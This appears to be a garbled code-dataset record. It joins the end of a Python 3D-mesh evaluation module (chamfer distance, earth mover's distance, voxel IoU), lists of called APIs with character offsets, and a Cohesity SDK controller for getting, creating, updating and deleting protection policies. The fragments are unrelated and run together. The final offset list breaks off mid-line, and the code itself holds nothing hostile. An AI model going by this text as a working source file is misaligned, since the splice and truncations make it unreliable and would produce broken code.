mesh = trimesh.Trimesh(mesh_py.vertices, mesh_py.faces)
samples, _ = trimesh.sample.sample_surface(mesh, count)
samples_batch = torch.tensor(samples.reshape(64, -1, 3), dtype = torch.float)
grid = pymesh.VoxelGrid(2./dim)
grid.insert_mesh(mesh_py)
grid.create_grid()
idx = ((grid.mesh.vertices + 1.1) / 2.4 * dim).astype(np.int)
v = np.zeros([dim, dim, dim])
v[idx[:,0], idx[:,1], idx[:,2]] = 1
return samples_batch, samples, v
# compute chamfer distance, earth movers' distacne and intersection over union between two meshes
def get_test_results(mesh_py_1, mesh_py_2):
samples_batch_1, samples_1, v1 = mesh_test(mesh_py_1)
samples_batch_2, samples_2, v2 = mesh_test(mesh_py_2)
dist1, dist2, _, _ = chamfer_python.distChamfer(samples_batch_1, samples_batch_2)
chamfer_dist = torch.mean(dist1) + torch.mean(dist2)
emd = emd_samples(samples_1, samples_2)
intersection = np.sum(np.logical_and(v1, v2))
union = np.sum(np.logical_or(v1, v2))
iou = intersection/union
return chamfer_dist, emd, iou
| [
"numpy.clip",
"numpy.sqrt",
"pyemd.emd_samples",
"trimesh.sample.sample_surface",
"skimage.measure.marching_cubes_lewiner",
"numpy.array",
"numpy.sin",
"numpy.arange",
"numpy.where",
"torch.mean",
"numpy.linspace",
"pymesh.form_mesh",
"numpy.vstack",
"numpy.concatenate",
"pyrender.Mesh.f... | [((2036, 2067), 'numpy.expand_dims', 'np.expand_dims', (['x_mesh'], {'axis': '(-1)'}), '(x_mesh, axis=-1)\n', (2050, 2067), True, 'import numpy as np\n'), ((2085, 2116), 'numpy.expand_dims', 'np.expand_dims', (['y_mesh'], {'axis': '(-1)'}), '(y_mesh, axis=-1)\n', (2099, 2116), True, 'import numpy as np\n'), ((2134, 2165), 'numpy.expand_dims', 'np.expand_dims', (['z_mesh'], {'axis': '(-1)'}), '(z_mesh, axis=-1)\n', (2148, 2165), True, 'import numpy as np\n'), ((2535, 2571), 'numpy.ones', 'np.ones', (['(1, meshgrid_flat.shape[1])'], {}), '((1, meshgrid_flat.shape[1]))\n', (2542, 2571), True, 'import numpy as np\n'), ((2594, 2625), 'numpy.vstack', 'np.vstack', (['(meshgrid_flat, one)'], {}), '((meshgrid_flat, one))\n', (2603, 2625), True, 'import numpy as np\n'), ((2851, 2904), 'torch.tensor', 'torch.tensor', (['transformed_meshgrid'], {'dtype': 'torch.float'}), '(transformed_meshgrid, dtype=torch.float)\n', (2863, 2904), False, 'import torch\n'), ((3062, 3072), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (3069, 3072), True, 'import numpy as np\n'), ((3274, 3352), 'numpy.array', 'np.array', (['[[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]]'], {}), '([[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]])\n', (3282, 3352), True, 'import numpy as np\n'), ((3573, 3583), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (3580, 3583), True, 'import numpy as np\n'), ((4297, 4375), 'numpy.array', 'np.array', (['[[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]]'], {}), '([[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]])\n', (4305, 4375), True, 'import numpy as np\n'), ((5395, 5473), 'numpy.array', 'np.array', (['[[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]]'], {}), '([[scale, 0, 0, 0], [0, scale, 0, 0], [0, 0, scale, 0], [0, 0, 0, 1]])\n', (5403, 5473), True, 'import numpy as np\n'), ((6062, 6096), 'numpy.clip', 'np.clip', (['sample_pt', '(0)', '(voxsize - 1)'], {}), '(sample_pt, 0, voxsize - 1)\n', (6069, 6096), True, 'import numpy as np\n'), ((6650, 6711), 'torch.empty', 'torch.empty', (['(batch_size, sample_size, channel_size, 2, 2, 2)'], {}), '((batch_size, sample_size, channel_size, 2, 2, 2))\n', (6661, 6711), False, 'import torch\n'), ((8042, 8053), 'time.time', 'time.time', ([], {}), '()\n', (8051, 8053), False, 'import time\n'), ((8069, 8109), 'numpy.zeros', 'np.zeros', (['(grid_res, grid_res, grid_res)'], {}), '((grid_res, grid_res, grid_res))\n', (8077, 8109), True, 'import numpy as np\n'), ((8413, 8486), 'torch.clamp', 'torch.clamp', (['(sample_pt_normalized * (vox_res - 1))', '(0)', '(vox_res - 1 - 1e-05)'], {}), '(sample_pt_normalized * (vox_res - 1), 0, vox_res - 1 - 1e-05)\n', (8424, 8486), False, 'import torch\n'), ((11192, 11226), 'pymesh.form_mesh', 'pymesh.form_mesh', (['(2 * verts)', 'faces'], {}), '(2 * verts, faces)\n', (11208, 11226), False, 'import pymesh\n'), ((11236, 11284), 'trimesh.Trimesh', 'trimesh.Trimesh', (['mesh_py.vertices', 'mesh_py.faces'], {}), '(mesh_py.vertices, mesh_py.faces)\n', (11251, 11284), False, 'import trimesh\n'), ((11288, 11322), 'trimesh.repair.fix_inversion', 'trimesh.repair.fix_inversion', (['mesh'], {}), '(mesh)\n', (11316, 11322), False, 'import trimesh\n'), ((11327, 11358), 'trimesh.repair.fill_holes', 'trimesh.repair.fill_holes', (['mesh'], {}), '(mesh)\n', (11352, 11358), False, 'import trimesh\n'), ((11452, 11494), 'trimesh.Trimesh', 'trimesh.Trimesh', (['mesh.vertices', 'mesh.faces'], {}), '(mesh.vertices, mesh.faces)\n', (11467, 11494), False, 'import trimesh\n'), ((11508, 11541), 'pyrender.Mesh.from_trimesh', 'pyrender.Mesh.from_trimesh', (['model'], {}), '(model)\n', (11534, 11541), False, 'import pyrender\n'), ((11554, 11570), 'pyrender.Scene', 'pyrender.Scene', ([], {}), '()\n', (11568, 11570), False, 'import pyrender\n'), ((11607, 11670), 'pyrender.Viewer', 'pyrender.Viewer', (['scene'], {'use_raymond_lighting': '(True)', 'point_size': '(2)'}), '(scene, use_raymond_lighting=True, point_size=2)\n', (11622, 11670), False, 'import pyrender\n'), ((11746, 11794), 'trimesh.Trimesh', 'trimesh.Trimesh', (['mesh_py.vertices', 'mesh_py.faces'], {}), '(mesh_py.vertices, mesh_py.faces)\n', (11761, 11794), False, 'import trimesh\n'), ((11812, 11854), 'trimesh.sample.sample_surface', 'trimesh.sample.sample_surface', (['mesh', 'count'], {}), '(mesh, count)\n', (11841, 11854), False, 'import trimesh\n'), ((11958, 11985), 'pymesh.VoxelGrid', 'pymesh.VoxelGrid', (['(2.0 / dim)'], {}), '(2.0 / dim)\n', (11974, 11985), False, 'import pymesh\n'), ((12115, 12140), 'numpy.zeros', 'np.zeros', (['[dim, dim, dim]'], {}), '([dim, dim, dim])\n', (12123, 12140), True, 'import numpy as np\n'), ((12518, 12578), 'chamfer_python.distChamfer', 'chamfer_python.distChamfer', (['samples_batch_1', 'samples_batch_2'], {}), '(samples_batch_1, samples_batch_2)\n', (12544, 12578), False, 'import chamfer_python\n'), ((12651, 12684), 'pyemd.emd_samples', 'emd_samples', (['samples_1', 'samples_2'], {}), '(samples_1, samples_2)\n', (12662, 12684), False, 'from pyemd import emd_samples\n'), ((5686, 5696), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (5693, 5696), True, 'import numpy as np\n'), ((6115, 6151), 'numpy.ones', 'np.ones', (['(voxsize, voxsize, voxsize)'], {}), '((voxsize, voxsize, voxsize))\n', (6122, 6151), True, 'import numpy as np\n'), ((8129, 8147), 'numpy.where', 'np.where', (['(vox == 0)'], {}), '(vox == 0)\n', (8137, 8147), True, 'import numpy as np\n'), ((8347, 8376), 'torch.tensor', 'torch.tensor', (['[0.5, 0.5, 0.5]'], {}), '([0.5, 0.5, 0.5])\n', (8359, 8376), False, 'import torch\n'), ((10461, 10509), 'skimage.measure.marching_cubes_lewiner', 'sk.marching_cubes_lewiner', (['vox'], {'level': 'isosurface'}), '(vox, level=isosurface)\n', (10486, 10509), True, 'import skimage.measure as sk\n'), ((10731, 10760), 'trimesh.Trimesh', 'trimesh.Trimesh', (['verts', 'faces'], {}), '(verts, faces)\n', (10746, 10760), False, 'import trimesh\n'), ((10813, 10844), 'trimesh.repair.fill_holes', 'trimesh.repair.fill_holes', (['mesh'], {}), '(mesh)\n', (10838, 10844), False, 'import trimesh\n'), ((10863, 10906), 'pymesh.form_mesh', 'pymesh.form_mesh', (['mesh.vertices', 'mesh.faces'], {}), '(mesh.vertices, mesh.faces)\n', (10879, 10906), False, 'import pymesh\n'), ((12598, 12615), 'torch.mean', 'torch.mean', (['dist1'], {}), '(dist1)\n', (12608, 12615), False, 'import torch\n'), ((12618, 12635), 'torch.mean', 'torch.mean', (['dist2'], {}), '(dist2)\n', (12628, 12635), False, 'import torch\n'), ((12716, 12738), 'numpy.logical_and', 'np.logical_and', (['v1', 'v2'], {}), '(v1, v2)\n', (12730, 12738), True, 'import numpy as np\n'), ((12759, 12780), 'numpy.logical_or', 'np.logical_or', (['v1', 'v2'], {}), '(v1, v2)\n', (12772, 12780), True, 'import numpy as np\n'), ((2214, 2259), 'numpy.concatenate', 'np.concatenate', (['(y_expand, z_expand)'], {'axis': '(-1)'}), '((y_expand, z_expand), axis=-1)\n', (2228, 2259), True, 'import numpy as np\n'), ((8195, 8242), 'torch.tensor', 'torch.tensor', (['(idx / grid_res)'], {'dtype': 'torch.float'}), '(idx / grid_res, dtype=torch.float)\n', (8207, 8242), False, 'import torch\n'), ((10185, 10208), 'torch.cat', 'torch.cat', (['pre_sdf_list'], {}), '(pre_sdf_list)\n', (10194, 10208), False, 'import torch\n'), ((382, 399), 'numpy.cos', 'np.cos', (['(D2R * phi)'], {}), '(D2R * phi)\n', (388, 399), True, 'import numpy as np\n'), ((399, 416), 'numpy.sin', 'np.sin', (['(D2R * phi)'], {}), '(D2R * phi)\n', (405, 416), True, 'import numpy as np\n'), ((464, 481), 'numpy.cos', 'np.cos', (['(D2R * phi)'], {}), '(D2R * phi)\n', (470, 481), True, 'import numpy as np\n'), ((617, 634), 'numpy.cos', 'np.cos', (['(D2R * phi)'], {}), '(D2R * phi)\n', (623, 634), True, 'import numpy as np\n'), ((634, 651), 'numpy.sin', 'np.sin', (['(D2R * phi)'], {}), '(D2R * phi)\n', (640, 651), True, 'import numpy as np\n'), ((699, 716), 'numpy.cos', 'np.cos', (['(D2R * phi)'], {}), '(D2R * phi)\n', (705, 716), True, 'import numpy as np\n'), ((447, 464), 'numpy.sin', 'np.sin', (['(D2R * phi)'], {}), '(D2R * phi)\n', (453, 464), True, 'import numpy as np\n'), ((682, 699), 'numpy.sin', 'np.sin', (['(D2R * phi)'], {}), '(D2R * phi)\n', (688, 699), True, 'import numpy as np\n'), ((933, 952), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (939, 952), True, 'import numpy as np\n'), ((1155, 1174), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1161, 1174), True, 'import numpy as np\n'), ((1377, 1396), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1383, 1396), True, 'import numpy as np\n'), ((1647, 1680), 'numpy.linspace', 'np.linspace', (['(-ratio)', 'ratio', 'width'], {}), '(-ratio, ratio, width)\n', (1658, 1680), True, 'import numpy as np\n'), ((1780, 1814), 'numpy.linspace', 'np.linspace', (['(-ratio)', 'ratio', 'height'], {}), '(-ratio, ratio, height)\n', (1791, 1814), True, 'import numpy as np\n'), ((1914, 1947), 'numpy.linspace', 'np.linspace', (['(-ratio)', 'ratio', 'depth'], {}), '(-ratio, ratio, depth)\n', (1925, 1947), True, 'import numpy as np\n'), ((5997, 6022), 'numpy.array', 'np.array', (['[0.5, 0.5, 0.5]'], {}), '([0.5, 0.5, 0.5])\n', (6005, 6022), True, 'import numpy as np\n'), ((6524, 6548), 'numpy.arange', 'np.arange', (['(0)', 'batch_size'], {}), '(0, batch_size)\n', (6533, 6548), True, 'import numpy as np\n'), ((6550, 6576), 'numpy.arange', 'np.arange', (['(0)', 'channel_size'], {}), '(0, channel_size)\n', (6559, 6576), True, 'import numpy as np\n'), ((6578, 6593), 'numpy.arange', 'np.arange', (['(0)', '(2)'], {}), '(0, 2)\n', (6587, 6593), True, 'import numpy as np\n'), ((6595, 6610), 'numpy.arange', 'np.arange', (['(0)', '(2)'], {}), '(0, 2)\n', (6604, 6610), True, 'import numpy as np\n'), ((6612, 6627), 'numpy.arange', 'np.arange', (['(0)', '(2)'], {}), '(0, 2)\n', (6621, 6627), True, 'import numpy as np\n'), ((982, 1001), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (988, 1001), True, 'import numpy as np\n'), ((1031, 1050), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1037, 1050), True, 'import numpy as np\n'), ((1107, 1126), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1113, 1126), True, 'import numpy as np\n'), ((1204, 1223), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1210, 1223), True, 'import numpy as np\n'), ((1280, 1299), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1286, 1299), True, 'import numpy as np\n'), ((1329, 1348), 'numpy.sin', 'np.sin', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1335, 1348), True, 'import numpy as np\n'), ((912, 931), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (918, 931), True, 'import numpy as np\n'), ((959, 978), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (965, 978), True, 'import numpy as np\n'), ((1008, 1027), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1014, 1027), True, 'import numpy as np\n'), ((1084, 1103), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1090, 1103), True, 'import numpy as np\n'), ((1134, 1153), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1140, 1153), True, 'import numpy as np\n'), ((1181, 1200), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1187, 1200), True, 'import numpy as np\n'), ((1257, 1276), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1263, 1276), True, 'import numpy as np\n'), ((1306, 1325), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1312, 1325), True, 'import numpy as np\n'), ((1356, 1375), 'numpy.cos', 'np.cos', (['(D2R * theta)'], {}), '(D2R * theta)\n', (1362, 1375), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import logging
from cohesity_management_sdk.api_helper import APIHelper
from cohesity_management_sdk.configuration import Configuration
from cohesity_management_sdk.controllers.base_controller import BaseController
from cohesity_management_sdk.http.auth.auth_manager import AuthManager
from cohesity_management_sdk.models.protection_policy import ProtectionPolicy
from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException
class ProtectionPolicies(BaseController):
"""A Controller to access Endpoints in the cohesity_management_sdk API."""
def __init__(self, client=None, call_back=None):
super(ProtectionPolicies, self).__init__(client, call_back)
self.logger = logging.getLogger(__name__)
def get_protection_policy_by_id(self,
id):
"""Does a GET request to /public/protectionPolicies/{id}.
Returns the Protection Policy corresponding to the specified Policy
Id.
Args:
id (string): Specifies a unique id of the Protection Policy to
return.
Returns:
ProtectionPolicy: Response from the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('get_protection_policy_by_id called.')
# Validate required parameters
self.logger.info('Validating required parameters for get_protection_policy_by_id.')
self.validate_parameters(id=id)
# Prepare query URL
self.logger.info('Preparing query URL for get_protection_policy_by_id.')
_url_path = '/public/protectionPolicies/{id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'id': id
})
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
self.logger.info('Preparing headers for get_protection_policy_by_id.')
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
self.logger.info('Preparing and executing request for get_protection_policy_by_id.')
_request = self.http_client.get(_query_url, headers=_headers)
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'get_protection_policy_by_id')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for get_protection_policy_by_id.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ProtectionPolicy.from_dictionary)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
def update_protection_policy(self,
body,
id):
"""Does a PUT request to /public/protectionPolicies/{id}.
Returns the updated Protection Policy.
Args:
body (ProtectionPolicyRequest): Request to update a Protection
Policy.
id (string): Specifies a unique id of the Protection Policy to
return.
Returns:
ProtectionPolicy: Response from the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('update_protection_policy called.')
# Validate required parameters
self.logger.info('Validating required parameters for update_protection_policy.')
self.validate_parameters(body=body,
id=id)
# Prepare query URL
self.logger.info('Preparing query URL for update_protection_policy.')
_url_path = '/public/protectionPolicies/{id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'id': id
})
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
self.logger.info('Preparing headers for update_protection_policy.')
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
self.logger.info('Preparing and executing request for update_protection_policy.')
_request = self.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'update_protection_policy')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for update_protection_policy.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ProtectionPolicy.from_dictionary)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
def delete_protection_policy(self,
id):
"""Does a DELETE request to /public/protectionPolicies/{id}.
Returns Success if the Protection Policy is deleted.
Args:
id (string): Specifies a unique id of the Protection Policy to
return.
Returns:
void: Response from the API. No Content
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('delete_protection_policy called.')
# Validate required parameters
self.logger.info('Validating required parameters for delete_protection_policy.')
self.validate_parameters(id=id)
# Prepare query URL
self.logger.info('Preparing query URL for delete_protection_policy.')
_url_path = '/public/protectionPolicies/{id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'id': id
})
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare and execute request
self.logger.info('Preparing and executing request for delete_protection_policy.')
_request = self.http_client.delete(_query_url)
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'delete_protection_policy')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for delete_protection_policy.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
def get_protection_policies(self,
environments=None,
vault_ids=None,
tenant_ids=None,
all_under_hierarchy=None,
ids=None,
names=None):
"""Does a GET request to /public/protectionPolicies.
If no parameters are specified, all Protection Policies currently on
the
Cohesity Cluster are returned.
Specifying parameters filters the results that are returned.
Args:
environments (list of Environments1Enum, optional): Filter by
Environment type such as 'kVMware', 'kView', etc. Only
Policies protecting the specified environment type are
returned. NOTE: 'kPuppeteer' refers to Cohesity's Remote
Adapter.
vault_ids (list of long|int, optional): Filter by a list of Vault
ids. Policies archiving to any of the specified vaults will be
returned.
tenant_ids (list of string, optional): TenantIds contains ids of
the tenants for which objects are to be returned.
all_under_hierarchy (bool, optional): AllUnderHierarchy specifies
if objects of all the tenants under the hierarchy of the
logged in user's organization should be returned.
ids (list of string, optional): Filter by a list of Protection
Policy ids.
names (list of string, optional): Filter by a list of Protection
Policy names.
Returns:
list of ProtectionPolicy: Response from the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('get_protection_policies called.')
# Prepare query URL
self.logger.info('Preparing query URL for get_protection_policies.')
_url_path = '/public/protectionPolicies'
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_parameters = {
'environments': environments,
'vaultIds': vault_ids,
'tenantIds': tenant_ids,
'allUnderHierarchy': all_under_hierarchy,
'ids': ids,
'names': names
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
self.logger.info('Preparing headers for get_protection_policies.')
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
self.logger.info('Preparing and executing request for get_protection_policies.')
_request = self.http_client.get(_query_url, headers=_headers)
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'get_protection_policies')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for get_protection_policies.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ProtectionPolicy.from_dictionary)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
def create_protection_policy(self,
body):
"""Does a POST request to /public/protectionPolicies.
Returns the created Protection Policy.
Args:
body (ProtectionPolicyRequest): Request to create a Protection
Policy.
Returns:
ProtectionPolicy: Response from the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
try:
self.logger.info('create_protection_policy called.')
# Validate required parameters
self.logger.info('Validating required parameters for create_protection_policy.')
self.validate_parameters(body=body)
# Prepare query URL
self.logger.info('Preparing query URL for create_protection_policy.')
_url_path = '/public/protectionPolicies'
_query_builder = Configuration.get_base_uri()
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
self.logger.info('Preparing headers for create_protection_policy.')
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
self.logger.info('Preparing and executing request for create_protection_policy.')
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
AuthManager.apply(_request)
_context = self.execute_request(_request, name = 'create_protection_policy')
# Endpoint and global error handling using HTTP status codes.
self.logger.info('Validating response for create_protection_policy.')
if _context.response.status_code == 0:
raise ErrorErrorException('Error', _context)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ProtectionPolicy.from_dictionary)
except Exception as e:
self.logger.error(e, exc_info = True)
raise
| [
"logging.getLogger",
"cohesity_management_sdk.configuration.Configuration.get_base_uri",
"cohesity_management_sdk.api_helper.APIHelper.append_url_with_template_parameters",
"cohesity_management_sdk.api_helper.APIHelper.json_serialize",
"cohesity_management_sdk.api_helper.APIHelper.clean_url",
"cohesity_ma... | [((776, 803), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (793, 803), False, 'import logging\n'), ((1989, 2057), 'cohesity_management_sdk.api_helper.APIHelper.append_url_with_template_parameters', 'APIHelper.append_url_with_template_parameters', (['_url_path', "{'id': id}"], {}), "(_url_path, {'id': id})\n", (2034, 2057), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((2117, 2145), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (2143, 2145), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((2211, 2246), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (2230, 2246), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((2671, 2698), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (2688, 2698), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((3166, 3259), 'cohesity_management_sdk.api_helper.APIHelper.json_deserialize', 'APIHelper.json_deserialize', (['_context.response.raw_body', 'ProtectionPolicy.from_dictionary'], {}), '(_context.response.raw_body, ProtectionPolicy.\n from_dictionary)\n', (3192, 3259), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((4670, 4738), 'cohesity_management_sdk.api_helper.APIHelper.append_url_with_template_parameters', 'APIHelper.append_url_with_template_parameters', (['_url_path', "{'id': id}"], {}), "(_url_path, {'id': id})\n", (4715, 4738), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((4798, 4826), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (4824, 4826), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((4892, 4927), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (4911, 4927), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((5456, 5483), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (5473, 5483), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((5945, 6038), 'cohesity_management_sdk.api_helper.APIHelper.json_deserialize', 'APIHelper.json_deserialize', (['_context.response.raw_body', 'ProtectionPolicy.from_dictionary'], {}), '(_context.response.raw_body, ProtectionPolicy.\n from_dictionary)\n', (5971, 6038), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((7271, 7339), 'cohesity_management_sdk.api_helper.APIHelper.append_url_with_template_parameters', 'APIHelper.append_url_with_template_parameters', (['_url_path', "{'id': id}"], {}), "(_url_path, {'id': id})\n", (7316, 7339), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((7399, 7427), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (7425, 7427), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((7493, 7528), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (7512, 7528), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((7737, 7764), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (7754, 7764), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((10589, 10617), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (10615, 10617), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((10978, 11094), 'cohesity_management_sdk.api_helper.APIHelper.append_url_with_query_parameters', 'APIHelper.append_url_with_query_parameters', (['_query_builder', '_query_parameters', 'Configuration.array_serialization'], {}), '(_query_builder,\n _query_parameters, Configuration.array_serialization)\n', (11020, 11094), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((11132, 11167), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (11151, 11167), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((11584, 11611), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (11601, 11611), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((12071, 12164), 'cohesity_management_sdk.api_helper.APIHelper.json_deserialize', 'APIHelper.json_deserialize', (['_context.response.raw_body', 'ProtectionPolicy.from_dictionary'], {}), '(_context.response.raw_body, ProtectionPolicy.\n from_dictionary)\n', (12097, 12164), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((13391, 13419), 'cohesity_management_sdk.configuration.Configuration.get_base_uri', 'Configuration.get_base_uri', ([], {}), '()\n', (13417, 13419), False, 'from cohesity_management_sdk.configuration import Configuration\n'), ((13485, 13520), 'cohesity_management_sdk.api_helper.APIHelper.clean_url', 'APIHelper.clean_url', (['_query_builder'], {}), '(_query_builder)\n', (13504, 13520), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((14050, 14077), 'cohesity_management_sdk.http.auth.auth_manager.AuthManager.apply', 'AuthManager.apply', (['_request'], {}), '(_request)\n', (14067, 14077), False, 'from cohesity_management_sdk.http.auth.auth_manager import AuthManager\n'), ((14539, 14632), 'cohesity_management_sdk.api_helper.APIHelper.json_deserialize', 'APIHelper.json_deserialize', (['_context.response.raw_body', 'ProtectionPolicy.from_dictionary'], {}), '(_context.response.raw_body, ProtectionPolicy.\n from_dictionary)\n', (14565, 14632), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((3024, 3062), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (3043, 3062), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((5803, 5841), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (5822, 5841), False, 'from 